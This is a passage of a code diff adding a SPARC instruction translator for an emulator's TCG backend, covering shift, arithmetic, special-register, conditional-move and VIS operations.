cpu_tmp0); + } else { + tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); + tcg_gen_andi_i64(tcg_ctx, cpu_dst, cpu_src1, 0xffffffffULL); + tcg_gen_shr_i64(tcg_ctx, cpu_dst, cpu_dst, cpu_tmp0); + } + } + gen_store_gpr(dc, rd, cpu_dst); + } else if (xop == 0x27) { /* sra, V9 srax */ + cpu_src1 = get_src1(dc, insn); + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 20, 31); + if (insn & (1 << 12)) { + tcg_gen_sari_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x3f); + } else { + tcg_gen_ext32s_i64(tcg_ctx, cpu_dst, cpu_src1); + tcg_gen_sari_i64(tcg_ctx, cpu_dst, cpu_dst, simm & 0x1f); + } + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + cpu_src2 = gen_load_gpr(dc, rs2); + cpu_tmp0 = get_temp_tl(dc); + if (insn & (1 << 12)) { + tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x3f); + tcg_gen_sar_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); + } else { + tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); + tcg_gen_ext32s_i64(tcg_ctx, cpu_dst, cpu_src1); + tcg_gen_sar_i64(tcg_ctx, cpu_dst, cpu_dst, cpu_tmp0); + } + } + gen_store_gpr(dc, rd, cpu_dst); +#endif + } else if (xop < 0x36) { + if (xop < 0x20) { + cpu_src1 = get_src1(dc, insn); + cpu_src2 = get_src2(dc, insn); + switch (xop & ~0x10) { + case 0x0: /* add */ + if (xop & 0x10) { + gen_op_add_cc(dc, cpu_dst, cpu_src1, cpu_src2); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_ADD); + dc->cc_op = CC_OP_ADD; + } else { + tcg_gen_add_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + } + break; + case 0x1: /* and */ + tcg_gen_and_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0x2: /* or */ + tcg_gen_or_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0x3: /* xor */ + tcg_gen_xor_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0x4: /* sub */ + if (xop & 0x10) { + gen_op_sub_cc(dc, cpu_dst, cpu_src1, cpu_src2); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_SUB); + dc->cc_op = CC_OP_SUB; + } else { + tcg_gen_sub_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + } + break; + case 0x5: /* andn */ + tcg_gen_andc_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0x6: /* orn */ + tcg_gen_orc_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0x7: /* xorn */ + tcg_gen_eqv_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0x8: /* addx, V9 addc */ + gen_op_addx_int(dc, cpu_dst, cpu_src1, cpu_src2, + (xop & 0x10)); + break; +#ifdef TARGET_SPARC64 + case 0x9: /* V9 mulx */ + tcg_gen_mul_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + break; +#endif + case 0xa: /* umul */ + CHECK_IU_FEATURE(dc, MUL); + gen_op_umul(dc, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0xb: /* smul */ + CHECK_IU_FEATURE(dc, MUL); + gen_op_smul(dc, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0xc: /* subx, V9 subc */ + gen_op_subx_int(dc, cpu_dst, cpu_src1, cpu_src2, + (xop & 0x10)); + break; +#ifdef TARGET_SPARC64 + case 0xd: /* V9 udivx */ + gen_helper_udivx(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); + break; +#endif + case 0xe: /* udiv */ + CHECK_IU_FEATURE(dc, DIV); + if (xop & 0x10) { + gen_helper_udiv_cc(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, + cpu_src2); + dc->cc_op = CC_OP_DIV; + } else { + gen_helper_udiv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, + cpu_src2); + } + break; + case 0xf: /* sdiv */ + CHECK_IU_FEATURE(dc, DIV); + if (xop & 0x10) { + gen_helper_sdiv_cc(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, + cpu_src2); + dc->cc_op = CC_OP_DIV; + } else { + gen_helper_sdiv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, + cpu_src2); + } + break; + default: + goto illegal_insn; + } + gen_store_gpr(dc, rd, cpu_dst); + } else { + cpu_src1 = get_src1(dc, insn); + cpu_src2 = get_src2(dc, insn); + switch (xop) { + case 0x20: /* taddcc */ + gen_op_add_cc(dc, cpu_dst, cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_TADD); + dc->cc_op = CC_OP_TADD; + break; + case 0x21: /* tsubcc */ + gen_op_sub_cc(dc, cpu_dst, cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_TSUB); + dc->cc_op = CC_OP_TSUB; + break; + case 0x22: /* taddcctv */ + gen_helper_taddcctv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, + cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + dc->cc_op = CC_OP_TADDTV; + break; + case 0x23: /* tsubcctv */ + gen_helper_tsubcctv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, + cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + dc->cc_op = CC_OP_TSUBTV; + break; + case 0x24: /* mulscc */ + update_psr(dc); + gen_op_mulscc(dc, cpu_dst, cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_ADD); + dc->cc_op = CC_OP_ADD; + break; +#ifndef TARGET_SPARC64 + case 0x25: /* sll */ + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 20, 31); + tcg_gen_shli_tl(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); + } else { /* register */ + cpu_tmp0 = get_temp_tl(dc); + tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); + tcg_gen_shl_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); + } + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x26: /* srl */ + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 20, 31); + tcg_gen_shri_tl(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); + } else { /* register */ + cpu_tmp0 = get_temp_tl(dc); + tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); + tcg_gen_shr_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); + } + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x27: /* sra */ + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 20, 31); + tcg_gen_sari_tl(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); + } else { /* register */ + cpu_tmp0 = get_temp_tl(dc); + tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); + tcg_gen_sar_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); + } + gen_store_gpr(dc, rd, cpu_dst); + break; +#endif + case 0x30: + { + cpu_tmp0 = get_temp_tl(dc); + switch(rd) { + case 0: /* wry */ + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_y, cpu_tmp0, 0xffffffff); + break; +#ifndef TARGET_SPARC64 + /* undefined in the SPARCv8 manual, nop on the microSPARC II */ + case 0x01: case 0x02: case 0x03: case 0x04: case 0x05: case 0x06: case 0x07: + case 0x08: case 0x09: case 0x0a: case 0x0b: case 0x0c: case 0x0d: case 0x0e: case 0x0f: + + /* implementation-dependent in the SPARCv8 manual, nop on the microSPARC II */ + case 0x10: case 0x11: case 0x12: case 0x13: case 0x14: case 0x15: case 0x16: case 0x17: + case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1e: case 0x1f: + if ((rd == 0x13) && (dc->def->features & + CPU_FEATURE_POWERDOWN)) { + /* LEON3 power-down */ + save_state(dc); + gen_helper_power_down(tcg_ctx, tcg_ctx->cpu_env); + } + break; +#else + case 0x2: /* V9 wrccr */ + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + gen_helper_wrccr(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_FLAGS); + dc->cc_op = CC_OP_FLAGS; + break; + case 0x3: /* V9 wrasi */ + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_tmp0, 0xff); + tcg_gen_trunc_tl_i32(tcg_ctx, tcg_ctx->cpu_asi, cpu_tmp0); + break; + case 0x6: /* V9 wrfprs */ + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + tcg_gen_trunc_tl_i32(tcg_ctx, tcg_ctx->cpu_fprs, cpu_tmp0); + save_state(dc); + gen_op_next_insn(dc); + tcg_gen_exit_tb(tcg_ctx, 0); + dc->is_br = 1; + break; + case 0xf: /* V9 sir, nop if user */ +#if !defined(CONFIG_USER_ONLY) + if (supervisor(dc)) { + ; // XXX + } +#endif + break; + case 0x13: /* Graphics Status */ + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + tcg_gen_xor_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_gsr, cpu_src1, cpu_src2); + break; + case 0x14: /* Softint set */ + if (!supervisor(dc)) + goto illegal_insn; + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + gen_helper_set_softint(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + break; + case 0x15: /* Softint clear */ + if (!supervisor(dc)) + goto illegal_insn; + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + gen_helper_clear_softint(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + break; + case 0x16: /* Softint write */ + if (!supervisor(dc)) + goto illegal_insn; + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + gen_helper_write_softint(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + break; + case 0x17: /* Tick compare */ +#if !defined(CONFIG_USER_ONLY) + if (!supervisor(dc)) + goto illegal_insn; +#endif + { + TCGv_ptr r_tickptr; + + tcg_gen_xor_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_tick_cmpr, cpu_src1, + cpu_src2); + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, tick)); + gen_helper_tick_set_limit(tcg_ctx, r_tickptr, + *(TCGv *)tcg_ctx->cpu_tick_cmpr); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + } + break; + case 0x18: /* System tick */ +#if !defined(CONFIG_USER_ONLY) + if (!supervisor(dc)) + goto illegal_insn; +#endif + { + TCGv_ptr r_tickptr; + + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, + cpu_src2); + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, stick)); + gen_helper_tick_set_count(tcg_ctx, r_tickptr, + cpu_tmp0); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + } + break; + case 0x19: /* System tick compare */ +#if !defined(CONFIG_USER_ONLY) + if (!supervisor(dc)) + goto illegal_insn; +#endif + { + TCGv_ptr r_tickptr; + + tcg_gen_xor_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_stick_cmpr, cpu_src1, + cpu_src2); + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, stick)); + gen_helper_tick_set_limit(tcg_ctx, r_tickptr, + *(TCGv *)tcg_ctx->cpu_stick_cmpr); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + } + break; + + case 0x10: /* Performance Control */ + case 0x11: /* Performance Instrumentation + Counter */ + case 0x12: /* Dispatch Control */ +#endif + default: + goto illegal_insn; + } + } + break; +#if !defined(CONFIG_USER_ONLY) + case 0x31: /* wrpsr, V9 saved, restored */ + { + if (!supervisor(dc)) + goto priv_insn; +#ifdef TARGET_SPARC64 + switch (rd) { + case 0: + gen_helper_saved(tcg_ctx, tcg_ctx->cpu_env); + break; + case 1: + gen_helper_restored(tcg_ctx, tcg_ctx->cpu_env); + break; + case 2: /* UA2005 allclean */ + case 3: /* UA2005 otherw */ + case 4: /* UA2005 normalw */ + case 5: /* UA2005 invalw */ + // XXX + default: + goto illegal_insn; + } +#else + cpu_tmp0 = get_temp_tl(dc); + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + gen_helper_wrpsr(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_FLAGS); + dc->cc_op = CC_OP_FLAGS; + save_state(dc); + gen_op_next_insn(dc); + tcg_gen_exit_tb(tcg_ctx, 0); + dc->is_br = 1; +#endif + } + break; + case 0x32: /* wrwim, V9 wrpr */ + { + if (!supervisor(dc)) + goto priv_insn; + cpu_tmp0 = get_temp_tl(dc); + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); +#ifdef TARGET_SPARC64 + switch (rd) { + case 0: // tpc + { + TCGv_ptr r_tsptr; + + r_tsptr = tcg_temp_new_ptr(tcg_ctx); + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_st_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, tpc)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 1: // tnpc + { + TCGv_ptr r_tsptr; + + r_tsptr = tcg_temp_new_ptr(tcg_ctx); + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_st_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, tnpc)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 2: // tstate + { + TCGv_ptr r_tsptr; + + r_tsptr = tcg_temp_new_ptr(tcg_ctx); + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_st_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, + tstate)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 3: // tt + { + TCGv_ptr r_tsptr; + + r_tsptr = tcg_temp_new_ptr(tcg_ctx); + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, tt)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 4: // tick + { + TCGv_ptr r_tickptr; + + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, tick)); + gen_helper_tick_set_count(tcg_ctx, r_tickptr, + cpu_tmp0); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + } + break; + case 5: // tba + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_tbr, cpu_tmp0); + break; + case 6: // pstate + save_state(dc); + gen_helper_wrpstate(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + dc->npc = DYNAMIC_PC; + break; + case 7: // tl + save_state(dc); + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, tl)); + dc->npc = DYNAMIC_PC; + break; + case 8: // pil + gen_helper_wrpil(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + break; + case 9: // cwp + gen_helper_wrcwp(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + break; + case 10: // cansave + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, + cansave)); + break; + case 11: // canrestore + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, + canrestore)); + break; + case 12: // cleanwin + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, + cleanwin)); + break; + case 13: // otherwin + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, + otherwin)); + break; + case 14: // wstate + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, + wstate)); + break; + case 16: // UA2005 gl + CHECK_IU_FEATURE(dc, GL); + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, gl)); + break; + case 26: // UA2005 strand status + CHECK_IU_FEATURE(dc, HYPV); + if (!hypervisor(dc)) + goto priv_insn; + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_ssr, cpu_tmp0); + break; + default: + goto illegal_insn; + } +#else + tcg_gen_trunc_tl_i32(tcg_ctx, *(TCGv *)tcg_ctx->cpu_wim, cpu_tmp0); + if (dc->def->nwindows != 32) { + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_wim, *(TCGv *)tcg_ctx->cpu_wim, + (1 << dc->def->nwindows) - 1); + } +#endif + } + break; + case 0x33: /* wrtbr, UA2005 wrhpr */ + { +#ifndef TARGET_SPARC64 + if (!supervisor(dc)) + goto priv_insn; + tcg_gen_xor_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_tbr, cpu_src1, cpu_src2); +#else + CHECK_IU_FEATURE(dc, HYPV); + if (!hypervisor(dc)) + goto priv_insn; + cpu_tmp0 = get_temp_tl(dc); + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + switch (rd) { + case 0: // hpstate + // XXX gen_op_wrhpstate(); + save_state(dc); + gen_op_next_insn(dc); + tcg_gen_exit_tb(tcg_ctx, 0); + dc->is_br = 1; + break; + case 1: // htstate + // XXX gen_op_wrhtstate(); + break; + case 3: // hintp + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_hintp, cpu_tmp0); + break; + case 5: // htba + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_htba, cpu_tmp0); + break; + case 31: // hstick_cmpr + { + TCGv_ptr r_tickptr; + + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_hstick_cmpr, cpu_tmp0); + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, hstick)); + gen_helper_tick_set_limit(tcg_ctx, r_tickptr, + *(TCGv *)tcg_ctx->cpu_hstick_cmpr); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + } + break; + case 6: // hver readonly + default: + goto illegal_insn; + } +#endif + } + break; +#endif +#ifdef TARGET_SPARC64 + case 0x2c: /* V9 movcc */ + { + int cc = GET_FIELD_SP(insn, 11, 12); + int cond = GET_FIELD_SP(insn, 14, 17); + DisasCompare cmp; + TCGv dst; + + if (insn & (1 << 18)) { + if (cc == 0) { + gen_compare(dc, &cmp, 0, cond); + } else if (cc == 2) { + gen_compare(dc, &cmp, 1, cond); + } else { + goto illegal_insn; + } + } else { + gen_fcompare(dc, &cmp, cc, cond); + } + + /* The get_src2 above loaded the normal 13-bit + immediate field, not the 11-bit field we have + in movcc. But it did handle the reg case. */ + if (IS_IMM) { + simm = GET_FIELD_SPs(insn, 0, 10); + tcg_gen_movi_tl(tcg_ctx, cpu_src2, simm); + } + + dst = gen_load_gpr(dc, rd); + tcg_gen_movcond_tl(tcg_ctx, cmp.cond, dst, + cmp.c1, cmp.c2, + cpu_src2, dst); + free_compare(tcg_ctx, &cmp); + gen_store_gpr(dc, rd, dst); + break; + } + case 0x2d: /* V9 sdivx */ + gen_helper_sdivx(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x2e: /* V9 popc */ + gen_helper_popc(tcg_ctx, cpu_dst, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x2f: /* V9 movr */ + { + int cond = GET_FIELD_SP(insn, 10, 12); + DisasCompare cmp; + TCGv dst; + + gen_compare_reg(dc, &cmp, cond, cpu_src1); + + /* The get_src2 above loaded the normal 13-bit + immediate field, not the 10-bit field we have + in movr. But it did handle the reg case. */ + if (IS_IMM) { + simm = GET_FIELD_SPs(insn, 0, 9); + tcg_gen_movi_tl(tcg_ctx, cpu_src2, simm); + } + + dst = gen_load_gpr(dc, rd); + tcg_gen_movcond_tl(tcg_ctx, cmp.cond, dst, + cmp.c1, cmp.c2, + cpu_src2, dst); + free_compare(tcg_ctx, &cmp); + gen_store_gpr(dc, rd, dst); + break; + } +#endif + default: + goto illegal_insn; + } + } + } else if (xop == 0x36) { /* UltraSparc shutdown, VIS, V8 CPop1 */ +#ifdef TARGET_SPARC64 + int opf = GET_FIELD_SP(insn, 5, 13); + rs1 = GET_FIELD(insn, 13, 17); + rs2 = GET_FIELD(insn, 27, 31); + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + + switch (opf) { + case 0x000: /* VIS I edge8cc */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 1, 0); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x001: /* VIS II edge8n */ + CHECK_FPU_FEATURE(dc, VIS2); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 0, 0); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x002: /* VIS I edge8lcc */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 1, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x003: /* VIS II edge8ln */ + CHECK_FPU_FEATURE(dc, VIS2); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 0, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x004: /* VIS I edge16cc */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 1, 0); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x005: /* VIS II edge16n */ + CHECK_FPU_FEATURE(dc, VIS2); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 0, 0); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x006: /* VIS I edge16lcc */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 1, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x007: /* VIS II edge16ln */ + CHECK_FPU_FEATURE(dc, VIS2); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 0, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x008: /* VIS I edge32cc */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 1, 0); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x009: /* VIS II edge32n */ + CHECK_FPU_FEATURE(dc, VIS2); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 0, 0); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x00a: /* VIS I edge32lcc */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 1, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x00b: /* VIS II edge32ln */ + CHECK_FPU_FEATURE(dc, VIS2); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 0, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x010: /* VIS I array8 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_helper_array8(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x012: /* VIS I array16 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_helper_array8(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_dst, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x014: /* VIS I array32 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_helper_array8(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_dst, 2); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x018: /* VIS I alignaddr */ + CHECK_FPU_FEATURE(dc, 